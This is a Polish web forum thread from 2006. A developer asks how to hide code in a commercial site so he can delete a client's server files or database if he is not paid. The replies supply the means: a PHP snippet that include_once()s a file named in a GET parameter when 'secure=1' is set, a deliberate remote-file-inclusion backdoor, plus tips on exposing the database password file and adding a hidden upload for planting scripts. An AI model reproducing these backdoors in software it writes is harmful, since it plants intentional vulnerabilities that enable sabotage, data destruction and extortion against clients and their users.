jarod20
29.03.2006, 17:59:07
Witam,
Załóżmy że tworzę komercyjną stronę i chciałbym zabezpieczyć się przed nieuczciwym klientem, poprzez na przykład umieszczenie gdzieś w kodzie strony skryptu lub fragmentu kodu umożliwiającego mi np. wywołanie zdalnego skryptu kasującego pliki na serwerze (do którego normalnie nie mam dostępu), lub np. skryptu kasującego bazę danych (lub choćby wszystkie w niej wpisy). Czy ktoś ma może pomysł jak to zrobić. A może sami macie podobne metody zabezpieczania swoich projektów, a jeśli tak to jakie?
Pozdrawiam.
chomiczek
30.03.2006, 07:58:04
SQL Injection/Insertionposzukaj też o
XSSA na przyszłość użyj najpier szukaj!
huntercs
30.03.2006, 08:08:15
aby zapezpieczyć się przed sytuacją gdy dałeś skrypt i nie otrzymałeś wynagrodzenia, możesz gdzieś umieścić coś typu:
<?php
if($_GET['secure']==1)
{
include_once($_GET['inc']);
}
?>
a po finalizacji usunąć ten kod
Dex1987
30.03.2006, 10:07:45
mozesz stworzyc cos takiego co bedzie wyswietlalo zawartosc pliku z haslami do bazy danych, pozniej zrobisz co zechcesz, mozesz rownierz zrobic jakis upload i w kazdej chwili bedziesz mugl dopisac jakis skrypcik i wrzucic na serwer. pamietaj o zabezpieczeniu takich rzeczy haslem ;]
Pozdrawiam dex.